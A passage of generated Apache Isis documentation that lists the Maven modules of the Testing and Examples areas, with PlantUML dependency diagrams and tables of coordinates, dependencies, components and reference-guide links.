#fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<6>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<7>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<8>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<9>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<10>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Testing\\n[Software System]\" {\n rectangle \"==Apache Isis Testing\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Tst - FakeData (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis Tst - FakeData (fixtures)\\n<size:10>[Container: packaging: jar]<\/size>\" <<5>> as 5\n rectangle \"==Apache Isis Tst - FakeData (integ tests)\\n<size:10>[Container: packaging: jar]<\/size>\" <<6>> as 6\n rectangle \"==Apache Isis Tst - FakeData (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Tst - Fixtures (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<8>> as 8\n rectangle \"==Apache Isis Tst - Fixtures (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<7>> as 7\n rectangle \"==Apache Isis Tst - H2 Console (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<9>> as 9\n rectangle \"==Apache Isis Tst - H2 Console (ui)\\n<size:10>[Container: packaging: jar]<\/size>\" <<10>> as 10\n rectangle \"==Apache Isis Tst - HSQLDB Manager\\n<size:10>[Container: packaging: jar]<\/size>\" <<12>> as 12\n rectangle \"==Apache Isis Tst - HSQLDB Manager (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<11>> as 11\n rectangle \"==Apache Isis Tst - Integ Test Support (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<14>> as 14\n rectangle \"==Apache Isis Tst - Integ Test Support (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<13>> as 13\n rectangle \"==Apache Isis Tst - Spec\/Cucumber (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<16>> as 16\n rectangle \"==Apache Isis Tst - Spec\/Cucumber (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<15>> as 15\n rectangle \"==Apache Isis Tst - Unit Test Support (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<18>> as 18\n rectangle \"==Apache Isis Tst - Unit Test Support (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<17>> as 17\n}\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 7 : \"\"\n2 .[#707070].> 9 : \"\"\n2 .[#707070].> 11 : \"\"\n2 .[#707070].> 13 : \"\"\n2 .[#707070].> 15 : \"\"\n2 .[#707070].> 17 : \"\"\n3 .[#707070].> 4 : \"\"\n3 .[#707070].> 5 : \"\"\n3 .[#707070].> 6 : \"\"\n7 .[#707070].> 8 : \"\"\n9 .[#707070].> 10 : \"\"\n11 .[#707070].> 12 : 
\"\"\n13 .[#707070].> 14 : \"\"\n15 .[#707070].> 16 : \"\"\n17 .[#707070].> 18 : \"\"\n@enduml\n----\n.Projects\/Modules (Testing)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Testing\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing\nType: pom\nDirectory: \/testing\n----\n|A library of utilities, mini-frameworks and tools for prototyping and testing Apache Isis applications.\n\n|Apache Isis Tst - FakeData (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-fakedata\nType: pom\nDirectory: \/testing\/fakedata\n----\n|A module providing a domain service to generate fake random data\nfor use in unit tests or integration tests.\n\n|Apache Isis Tst - FakeData (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-fakedata-applib\nType: jar\nDirectory: \/testing\/fakedata\/applib\n----\n|.Components\n****\no.a.i.testing.fakedata.applib.services.FakeDataService +\n****\n\n.Dependencies\n****\ncom.github.javafaker:javafaker:jar:<managed> +\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-unittestsupport-applib:jar:<managed> +\norg.projectlombok:lombok:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:testing:index\/fakedata\/applib\/IsisModuleTestingFakeDataApplib.adoc[IsisModuleTestingFakeDataApplib], xref:refguide:testing:index\/fakedata\/applib\/services\/AbstractRandomValueGenerator.adoc[AbstractRandomValueGenerator], xref:refguide:testing:index\/fakedata\/applib\/services\/Addresses.adoc[Addresses], xref:refguide:testing:index\/fakedata\/applib\/services\/BigDecimals.adoc[BigDecimals], xref:refguide:testing:index\/fakedata\/applib\/services\/BigIntegers.adoc[BigIntegers], xref:refguide:testing:index\/fakedata\/applib\/services\/Books.adoc[Books], xref:refguide:testing:index\/fakedata\/applib\/services\/Booleans.adoc[Booleans], xref:refguide:testing:index\/fakedata\/applib\/services\/Bytes.adoc[Bytes], xref:refguide:testing:index\/fakedata\/applib\/services\/Chars.adoc[Chars], xref:refguide:testing:index\/fakedata\/applib\/services\/Collections.adoc[Collections], xref:refguide:testing:index\/fakedata\/applib\/services\/Comms.adoc[Comms], xref:refguide:testing:index\/fakedata\/applib\/services\/CreditCards.adoc[CreditCards], xref:refguide:testing:index\/fakedata\/applib\/services\/Doubles.adoc[Doubles], xref:refguide:testing:index\/fakedata\/applib\/services\/Enums.adoc[Enums], xref:refguide:testing:index\/fakedata\/applib\/services\/FakeDataService.adoc[FakeDataService], xref:refguide:testing:index\/fakedata\/applib\/services\/Floats.adoc[Floats], xref:refguide:testing:index\/fakedata\/applib\/services\/Integers.adoc[Integers], xref:refguide:testing:index\/fakedata\/applib\/services\/IsisBlobs.adoc[IsisBlobs], xref:refguide:testing:index\/fakedata\/applib\/services\/IsisClobs.adoc[IsisClobs], xref:refguide:testing:index\/fakedata\/applib\/services\/IsisPasswords.adoc[IsisPasswords], xref:refguide:testing:index\/fakedata\/applib\/services\/J8DateTimes.adoc[J8DateTimes], xref:refguide:testing:index\/fakedata\/applib\/services\/J8LocalDates.adoc[J8LocalDates], xref:refguide:testing:index\/fakedata\/applib\/services\/J8Periods.adoc[J8Periods], xref:refguide:testing:index\/fakedata\/applib\/services\/JavaSqlDates.adoc[JavaSqlDates], xref:refguide:testing:index\/fakedata\/applib\/services\/JavaSqlTimestamps.adoc[JavaSqlTimestamps], 
xref:refguide:testing:index\/fakedata\/applib\/services\/JavaUtilDates.adoc[JavaUtilDates], xref:refguide:testing:index\/fakedata\/applib\/services\/JodaDateTimes.adoc[JodaDateTimes], xref:refguide:testing:index\/fakedata\/applib\/services\/JodaLocalDates.adoc[JodaLocalDates], xref:refguide:testing:index\/fakedata\/applib\/services\/JodaPeriods.adoc[JodaPeriods], xref:refguide:testing:index\/fakedata\/applib\/services\/Longs.adoc[Longs], xref:refguide:testing:index\/fakedata\/applib\/services\/Lorem.adoc[Lorem], xref:refguide:testing:index\/fakedata\/applib\/services\/Names.adoc[Names], xref:refguide:testing:index\/fakedata\/applib\/services\/Shorts.adoc[Shorts], xref:refguide:testing:index\/fakedata\/applib\/services\/Strings.adoc[Strings], xref:refguide:testing:index\/fakedata\/applib\/services\/Urls.adoc[Urls], xref:refguide:testing:index\/fakedata\/applib\/services\/Uuids.adoc[Uuids]\n****\n\n|Apache Isis Tst - FakeData (fixtures)\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-fakedata-fixtures\nType: jar\nDirectory: \/testing\/fakedata\/fixtures\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-fakedata-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-fixtures-applib:jar:<managed> +\norg.projectlombok:lombok:jar:<managed> +\n****\n\n|Apache Isis Tst - FakeData (integ tests)\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-fakedata-integtests\nType: jar\nDirectory: \/testing\/fakedata\/integtests\n----\n|.Dependencies\n****\norg.apache.isis.mavendeps:isis-mavendeps-integtests:pom:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-datanucleus:jar:<managed> +\norg.apache.isis.testing:isis-testing-fakedata-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-fakedata-fixtures:jar:<managed> +\n****\n\n|Apache Isis Tst - Fixtures (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-fixtures\nType: pom\nDirectory: \/testing\/fixtures\n----\n|Library to initialize the system under test, either for integration testing or for prototyping.\n\n|Apache Isis Tst - Fixtures (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-fixtures-applib\nType: jar\nDirectory: \/testing\/fixtures\/applib\n----\n|.Components\n****\no.a.i.testing.fixtures.applib.fixturescripts.ExecutionParametersService +\no.a.i.testing.fixtures.applib.modules.ModuleWithFixturesService +\no.a.i.testing.fixtures.applib.queryresultscache.QueryResultsCacheControlDefault +\no.a.i.testing.fixtures.applib.services.FixturesLifecycleService +\n****\n\n.Dependencies\n****\njoda-time:joda-time:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-applib:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jpa-applib:jar:<managed> +\norg.apache.isis.subdomains:isis-subdomains-spring-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-integtestsupport-applib:jar:<managed> +\n****\n\n|Apache Isis Tst - H2 Console (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-h2console\nType: pom\nDirectory: \/testing\/h2console\n----\n|Menu and configuration to open up H2 Console\n\n|Apache Isis Tst - H2 Console (ui)\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-h2console-ui\nType: jar\nDirectory: 
\/testing\/h2console\/ui\n----\n|.Components\n****\no.a.i.testing.h2console.ui.webmodule.WebModuleH2Console +\n****\n\n.Dependencies\n****\ncom.h2database:h2:jar:<managed> +\norg.apache.isis.core:isis-core-webapp:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:testing:index\/h2console\/ui\/IsisModuleTestingH2ConsoleUi.adoc[IsisModuleTestingH2ConsoleUi], xref:refguide:testing:index\/h2console\/ui\/services\/H2ManagerMenu.adoc[H2ManagerMenu], xref:refguide:testing:index\/h2console\/ui\/webmodule\/WebModuleH2Console.adoc[WebModuleH2Console]\n****\n\n|Apache Isis Tst - HSQLDB Manager (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-hsqldbmgr\nType: pom\nDirectory: \/testing\/hsqldbmgr\n----\n|Menu and configuration to open up HSQLDB Manager\n\n|Apache Isis Tst - HSQLDB Manager\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-hsqldbmgr-ui\nType: jar\nDirectory: \/testing\/hsqldbmgr\/ui\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-core-webapp:jar:<managed> +\norg.hsqldb:hsqldb:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/hsqldbmgr\/dom\/IsisModuleExtHsqldbMgr.adoc[IsisModuleExtHsqldbMgr], xref:refguide:extensions:index\/hsqldbmgr\/dom\/services\/HsqlDbManagerMenu.adoc[HsqlDbManagerMenu]\n****\n\n|Apache Isis Tst - Integ Test Support (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-integtestsupport\nType: pom\nDirectory: \/testing\/integtestsupport\n----\n|Support for writing integ tests in JUnit 5; should be added as a dependency with scope=test only\n\n|Apache Isis Tst - Integ Test Support (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-integtestsupport-applib\nType: jar\nDirectory: \/testing\/integtestsupport\/applib\n----\n|.Components\n****\no.a.i.testing.integtestsupport.applib.IsisIntegrationTestAbstract$InteractionSupport +\n****\n\n.Dependencies\n****\ncom.approvaltests:approvaltests:jar:<managed> +\ncom.h2database:h2:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtimeservices:jar:<managed> +\norg.apache.isis.security:isis-security-bypass:jar:<managed> +\norg.hamcrest:hamcrest-library:jar:<managed> +\norg.hsqldb:hsqldb:jar:<managed> +\norg.slf4j:slf4j-api:jar:${slf4j-api.version} +\norg.springframework:spring-test:jar:<managed> +\norg.springframework.boot:spring-boot-starter-test:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:testing:index\/integtestsupport\/applib\/ExceptionRecognizerTranslate.adoc[ExceptionRecognizerTranslate], xref:refguide:testing:index\/integtestsupport\/applib\/IsisIntegrationTestAbstract.adoc[IsisIntegrationTestAbstract], xref:refguide:testing:index\/integtestsupport\/applib\/IsisInteractionHandler.adoc[IsisInteractionHandler], xref:refguide:testing:index\/integtestsupport\/applib\/ThrowableMatchers.adoc[ThrowableMatchers], xref:refguide:testing:index\/integtestsupport\/applib\/swagger\/SwaggerExporter.adoc[SwaggerExporter], xref:refguide:testing:index\/integtestsupport\/applib\/validate\/DomainModelValidator.adoc[DomainModelValidator]\n****\n\n|Apache Isis Tst - Spec\/Cucumber (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-specsupport\nType: pom\nDirectory: \/testing\/specsupport\n----\n|Allows Cucumber to be used to write BDD-style specifications, generally as an alternative to integration tests.\n\n|Apache Isis Tst - 
Spec\/Cucumber (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-specsupport-applib\nType: jar\nDirectory: \/testing\/specsupport\/applib\n----\n|.Dependencies\n****\nio.cucumber:cucumber-java:jar:<managed> +\nio.cucumber:cucumber-junit-platform-engine:jar:<managed> +\nio.cucumber:cucumber-spring:jar:<managed> +\norg.apache.isis.testing:isis-testing-integtestsupport-applib:jar:<managed> +\norg.junit.jupiter:junit-jupiter-api:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:testing:index\/specsupport\/applib\/IsisModuleTestingSpecSupportApplib.adoc[IsisModuleTestingSpecSupportApplib], xref:refguide:testing:index\/specsupport\/applib\/integration\/ObjectFactoryForIntegration.adoc[ObjectFactoryForIntegration], xref:refguide:testing:index\/specsupport\/applib\/specs\/V.adoc[V]\n****\n\n|Apache Isis Tst - Unit Test Support (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-unittestsupport\nType: pom\nDirectory: \/testing\/unittestsupport\n----\n|A module providing test utilities for unit testing of domain modules\n\n|Apache Isis Tst - Unit Test Support (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-unittestsupport-applib\nType: jar\nDirectory: \/testing\/unittestsupport\/applib\n----\n|.Dependencies\n****\ncom.approvaltests:approvaltests:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-codegen-bytebuddy:jar:<managed> +\norg.datanucleus:javax.jdo:jar:<managed> +\norg.jmock:jmock:jar:<managed> +\norg.jmock:jmock-junit4:jar:<managed> +\norg.picocontainer:picocontainer:jar:<managed> +\norg.slf4j:slf4j-api:jar:<managed> +\norg.springframework:spring-test:jar:<managed> +\norg.springframework.boot:spring-boot-starter-test:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:testing:index\/unittestsupport\/applib\/IsisModuleTestingUnitTestSupportApplib.adoc[IsisModuleTestingUnitTestSupportApplib], xref:refguide:testing:index\/unittestsupport\/applib\/bean\/AbstractBeanPropertiesTest.adoc[AbstractBeanPropertiesTest], xref:refguide:testing:index\/unittestsupport\/applib\/bean\/FixtureDatumFactoriesForAnyPojo.adoc[FixtureDatumFactoriesForAnyPojo], xref:refguide:testing:index\/unittestsupport\/applib\/bean\/FixtureDatumFactoriesForApplib.adoc[FixtureDatumFactoriesForApplib], xref:refguide:testing:index\/unittestsupport\/applib\/bean\/FixtureDatumFactoriesForJoda.adoc[FixtureDatumFactoriesForJoda], xref:refguide:testing:index\/unittestsupport\/applib\/bean\/FixtureDatumFactoriesForTime.adoc[FixtureDatumFactoriesForTime], xref:refguide:testing:index\/unittestsupport\/applib\/bean\/PojoTester.adoc[PojoTester], xref:refguide:testing:index\/unittestsupport\/applib\/core\/AbstractApplyToAllContractTest.adoc[AbstractApplyToAllContractTest], xref:refguide:testing:index\/unittestsupport\/applib\/core\/bidir\/BidirectionalRelationshipContractTestAbstract.adoc[BidirectionalRelationshipContractTestAbstract], xref:refguide:testing:index\/unittestsupport\/applib\/core\/bidir\/Instantiator.adoc[Instantiator], xref:refguide:testing:index\/unittestsupport\/applib\/core\/bidir\/InstantiatorSimple.adoc[InstantiatorSimple], xref:refguide:testing:index\/unittestsupport\/applib\/core\/bidir\/Instantiators.adoc[Instantiators], xref:refguide:testing:index\/unittestsupport\/applib\/core\/comparable\/ComparableContractTest_compareTo.adoc[ComparableContractTest_compareTo], 
xref:refguide:testing:index\/unittestsupport\/applib\/core\/comparable\/ComparableContractTester.adoc[ComparableContractTester], xref:refguide:testing:index\/unittestsupport\/applib\/core\/files\/Files.adoc[Files], xref:refguide:testing:index\/unittestsupport\/applib\/core\/jaxb\/JaxbMatchers.adoc[JaxbMatchers], xref:refguide:testing:index\/unittestsupport\/applib\/core\/jmocking\/Imposterisers.adoc[Imposterisers], xref:refguide:testing:index\/unittestsupport\/applib\/core\/jmocking\/InjectIntoJMockAction.adoc[InjectIntoJMockAction], xref:refguide:testing:index\/unittestsupport\/applib\/core\/jmocking\/IsisActions.adoc[IsisActions], xref:refguide:testing:index\/unittestsupport\/applib\/core\/jmocking\/JMockActions.adoc[JMockActions], xref:refguide:testing:index\/unittestsupport\/applib\/core\/jmocking\/JUnitRuleMockery2.adoc[JUnitRuleMockery2], xref:refguide:testing:index\/unittestsupport\/applib\/core\/jmocking\/PostponedAction.adoc[PostponedAction], xref:refguide:testing:index\/unittestsupport\/applib\/core\/soap\/SoapEndpointPublishingRule.adoc[SoapEndpointPublishingRule], xref:refguide:testing:index\/unittestsupport\/applib\/core\/soap\/SoapEndpointSpec.adoc[SoapEndpointSpec], xref:refguide:testing:index\/unittestsupport\/applib\/core\/sortedsets\/SortedSetsContractTestAbstract.adoc[SortedSetsContractTestAbstract], xref:refguide:testing:index\/unittestsupport\/applib\/core\/streams\/NullPrintStream.adoc[NullPrintStream], xref:refguide:testing:index\/unittestsupport\/applib\/core\/utils\/CollectUtils.adoc[CollectUtils], xref:refguide:testing:index\/unittestsupport\/applib\/core\/utils\/IndentPrinter.adoc[IndentPrinter], xref:refguide:testing:index\/unittestsupport\/applib\/core\/utils\/ReflectUtils.adoc[ReflectUtils], xref:refguide:testing:index\/unittestsupport\/applib\/core\/utils\/StringUtils.adoc[StringUtils], xref:refguide:testing:index\/unittestsupport\/applib\/core\/value\/ValueTypeContractTestAbstract.adoc[ValueTypeContractTestAbstract], xref:refguide:testing:index\/unittestsupport\/applib\/dom\/assertions\/Asserting.adoc[Asserting], xref:refguide:testing:index\/unittestsupport\/applib\/dom\/matchers\/IsisMatchers.adoc[IsisMatchers], xref:refguide:testing:index\/unittestsupport\/applib\/dom\/privatecons\/PrivateConstructorTester.adoc[PrivateConstructorTester], xref:refguide:testing:index\/unittestsupport\/applib\/dom\/reflect\/ReflectUtils.adoc[ReflectUtils], xref:refguide:testing:index\/unittestsupport\/applib\/dom\/repo\/FinderInteraction.adoc[FinderInteraction]\n****\n|===\n\n== Examples\n\n[plantuml,Examples,svg]\n----\n@startuml(id=Examples)\ntitle Examples - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<6>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<7>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Examples\\n[Software System]\" {\n rectangle \"==Demo - Domain\\n<size:10>[Container: packaging: jar]<\/size>\" 
<<3>> as 3
 rectangle "==Demo - JavaFX\n<size:10>[Container: packaging: jar]</size>" <<4>> as 4
 rectangle "==Demo - Parent\n<size:10>[Container: packaging: pom]</size>" <<2>> as 2
 rectangle "==Demo - Vaadin\n<size:10>[Container: packaging: jar]</size>" <<5>> as 5
 rectangle "==Demo - Web\n<size:10>[Container: packaging: jar]</size>" <<6>> as 6
 rectangle "==Demo - Wicket\n<size:10>[Container: packaging: jar]</size>" <<7>> as 7
}
2 .[#707070].> 3 : ""
2 .[#707070].> 4 : ""
2 .[#707070].> 5 : ""
2 .[#707070].> 6 : ""
2 .[#707070].> 7 : ""
@enduml
----
.Projects/Modules (Examples)
[cols="3a,5a", options="header"]
|===
|Coordinates |Description

|Demo - Parent
[source,yaml]
----
Group: org.apache.isis.examples.apps
Artifact: demo-parent
Type: pom
Directory: /examples/demo
----
|.Dependencies
****
com.h2database:h2:jar:<managed> +
org.apache.isis.extensions:isis-extensions-exceldownload-ui:jar:<managed> +
org.apache.isis.extensions:isis-extensions-modelannotation:jar:<managed> +
org.apache.isis.extensions:isis-extensions-secman-encryption-jbcrypt:jar:<managed> +
org.apache.isis.extensions:isis-extensions-secman-model:jar:<managed> +
org.apache.isis.extensions:isis-extensions-secman-persistence-jdo:jar:<managed> +
org.apache.isis.extensions:isis-extensions-secman-shiro-realm:jar:<managed> +
org.apache.isis.mavendeps:isis-mavendeps-jdk11:pom:<managed> +
org.apache.isis.mavendeps:isis-mavendeps-jdo:pom:<managed> +
org.apache.isis.valuetypes:isis-valuetypes-asciidoc-metamodel:jar:<managed> +
org.apache.isis.valuetypes:isis-valuetypes-asciidoc-persistence-jdo-dn5:jar:<managed> +
org.apache.isis.valuetypes:isis-valuetypes-markdown-metamodel:jar:<managed> +
org.apache.isis.valuetypes:isis-valuetypes-markdown-persistence-jdo-dn5:jar:<managed> +
org.apache.isis.valuetypes:isis-valuetypes-sse-applib:jar:<managed> +
org.projectlombok:lombok:jar:<managed> +
****

|Demo - Domain
[source,yaml]
----
Group: org.apache.isis.examples.apps
Artifact: demo-domain
Type: jar
Directory: /examples/demo/domain
----
|.Components
****
demoapp.dom.AppConfiguration +
demoapp.dom._infra.DefaultTitleProvider +
demoapp.dom._infra.LibraryPreloadingService +
demoapp.dom._infra.fixtures.DemoFixtureScriptSpecificationProvider +
demoapp.dom._infra.resources.AsciiDocConverterService +
demoapp.dom._infra.resources.AsciiDocReaderService +
demoapp.dom._infra.resources.MarkdownReaderService +
demoapp.dom._infra.resources.MarkupReaderService +
demoapp.dom._infra.resources.MarkupVariableResolverService +
demoapp.dom._infra.resources.ResourceReaderService +
demoapp.dom._infra.samples.NameSamples +
demoapp.dom._infra.urlencoding.UrlEncodingServiceNaiveInMemory +
demoapp.dom.domain._changes.EntityChangesSubscriberToCaptureChangesInMemory +
demoapp.dom.domain._commands.ExposePersistedCommands$TableColumnOrderDefault +
demoapp.dom.domain._interactions.ExecutionListenerToCaptureInteractionsInMemory +
demoapp.dom.domain.actions.Action.commandPublishing.ActionCommandPublishingJdoEntities +
demoapp.dom.domain.actions.Action.commandPublishing.ActionCommandPublishingJdoSeedService +
demoapp.dom.domain.actions.Action.executionPublishing.ActionExecutionPublishingJdoEntities +
demoapp.dom.domain.actions.Action.executionPublishing.ActionExecutionPublishingJdoSeedService +
demoapp.dom.domain.objects.DomainObject.entityChangePublishing.annotated.disabled.DomainObjectEntityChangePublishingDisabledJdoEntities +
demoapp.dom.domain.objects.DomainObject.entityChangePublishing.annotated.disabled.DomainObjectEntityChangePublishingDisabledJdoSeedService +
demoapp.dom.domain.objects.DomainObject.entityChangePublishing.annotated.enabled.DomainObjectAuditingEnabledJdoEntities +
demoapp.dom.domain.objects.DomainObject.entityChangePublishing.annotated.enabled.DomainObjectAuditingEnabledJdoSeedService +
demoapp.dom.domain.objects.DomainObject.entityChangePublishing.metaAnnot.enabled.DomainObjectEntityChangePublishingEnabledMetaAnnotatedJdoEntities +
demoapp.dom.domain.objects.DomainObject.entityChangePublishing.metaAnnot.enabled.DomainObjectEntityChangePublishingEnabledMetaAnnotatedJdoSeedService +
demoapp.dom.domain.objects.DomainObject.entityChangePublishing.metaAnnotOverridden.enabled.DomainObjectEntityChangePublishingEnabledMetaAnnotOverriddenJdoEntities +
demoapp.dom.domain.objects.DomainObject.entityChangePublishing.metaAnnotOverridden.enabled.DomainObjectEntityChangePublishingEnabledMetaAnnotOverriddenJdoSeedService +
demoapp.dom.domain.objects.DomainObject.nature.viewmodels.jaxbrefentity.ChildJdoEntities +
demoapp.dom.domain.objects.DomainObject.nature.viewmodels.jaxbrefentity.seed.ChildJdoSeedService +
demoapp.dom.domain.objects.other.embedded.NumberConstantJdoRepository +
demoapp.dom.domain.properties.Property.commandPublishing.PropertyCommandPublishingJdoEntities +
demoapp.dom.domain.properties.Property.commandPublishing.PropertyCommandPublishingJdoSeedService +
demoapp.dom.domain.properties.Property.executionPublishing.PropertyExecutionPublishingJdoEntities +
demoapp.dom.domain.properties.Property.executionPublishing.PropertyExecutionPublishingJdoSeedService +
demoapp.dom.domain.properties.Property.projecting.jdo.PropertyProjectingChildJdoEntities +
demoapp.dom.domain.properties.Property.projecting.jdo.PropertyProjectingChildJdoSeedService +
demoapp.dom.domain.properties.PropertyLayout.navigable.FileTreeNodeService +
demoapp.dom.domain.properties.PropertyLayout.repainting.PdfJsViewerAdvisorFallback +
demoapp.dom.featured.customui.geocoding.GeoapifyClient +
demoapp.dom.services.core.errorreportingservice.ErrorReportingServiceDemoImplementation +
demoapp.dom.services.core.eventbusservice.EventLogEntryJdoRepository +
demoapp.dom.services.core.eventbusservice.EventSubscriberDemoImplementation +
demoapp.dom.services.core.wrapperFactory.WrapperFactoryJdoEntities +
demoapp.dom.services.core.wrapperFactory.WrapperFactoryJdoSeedService +
demoapp.dom.services.extensions.secman.apptenancy.ApplicationTenancyEvaluatorForDemo +
demoapp.dom.services.extensions.secman.apptenancy.entities.TenantedJdoEntities +
demoapp.dom.services.extensions.secman.apptenancy.entities.seed.TenantedJdoSeedService +
demoapp.dom.types.isis.blobs.jdo.IsisBlobJdoEntities +
demoapp.dom.types.isis.blobs.jdo.IsisBlobJdoSeedService +
demoapp.dom.types.isis.blobs.samples.IsisBlobsSamples +
demoapp.dom.types.isis.clobs.jdo.IsisClobJdoEntities +
demoapp.dom.types.isis.clobs.jdo.IsisClobJdoSeedService +
demoapp.dom.types.isis.clobs.samples.IsisClobsSamples +
demoapp.dom.types.isis.localresourcepaths.jdo.IsisLocalResourcePathJdoEntities +
demoapp.dom.types.isis.localresourcepaths.jdo.IsisLocalResourcePathJdoSeedService +
demoapp.dom.types.isis.localresourcepaths.samples.IsisLocalResourcePathsSamples +
demoapp.dom.types.isis.markups.jdo.IsisMarkupJdoEntities +
demoapp.dom.types.isis.markups.jdo.IsisMarkupJdoSeedService +
demoapp.dom.types.isis.markups.samples.IsisMarkupSamples +
demoapp.dom.types.isis.passwords.jdo.IsisPasswordJdoEntities +
demoapp.dom.types.isis.passwords.jdo.IsisPasswordJdoSeedService +
demoapp.dom.types.isis.passwords.samples.IsisPasswordsSamples +
demoapp.dom.types.isisext.asciidocs.jdo.IsisAsciiDocJdoEntities +
demoapp.dom.types.isisext.asciidocs.jdo.IsisAsciiDocJdoSeedService +
demoapp.dom.types.isisext.asciidocs.samples.IsisAsciiDocSamples +
demoapp.dom.types.isisext.markdowns.jdo.IsisMarkdownJdoEntities +
demoapp.dom.types.isisext.markdowns.jdo.IsisMarkdownJdoSeedService +
demoapp.dom.types.isisext.markdowns.samples.IsisMarkdownSamples +
demoapp.dom.types.javaawt.images.jdo.JavaAwtImageJdoEntities +
demoapp.dom.types.javaawt.images.jdo.JavaAwtImageJdoSeedService +
demoapp.dom.types.javaawt.images.samples.JavaAwtImageService +
demoapp.dom.types.javaawt.images.samples.JavaAwtImagesSamples +
demoapp.dom.types.javalang.booleans.jdo.WrapperBooleanJdoEntities +
demoapp.dom.types.javalang.booleans.jdo.WrapperBooleanJdoSeedService +
demoapp.dom.types.javalang.booleans.samples.WrapperBooleanSamples +
demoapp.dom.types.javalang.bytes.jdo.WrapperByteJdoEntities +
demoapp.dom.types.javalang.bytes.jdo.WrapperByteJdoSeedService +
demoapp.dom.types.javalang.bytes.samples.WrapperByteSamples +
demoapp.dom.types.javalang.characters.jdo.WrapperCharacterJdoEntities +
demoapp.dom.types.javalang.characters.jdo.WrapperCharacterJdoSeedService +
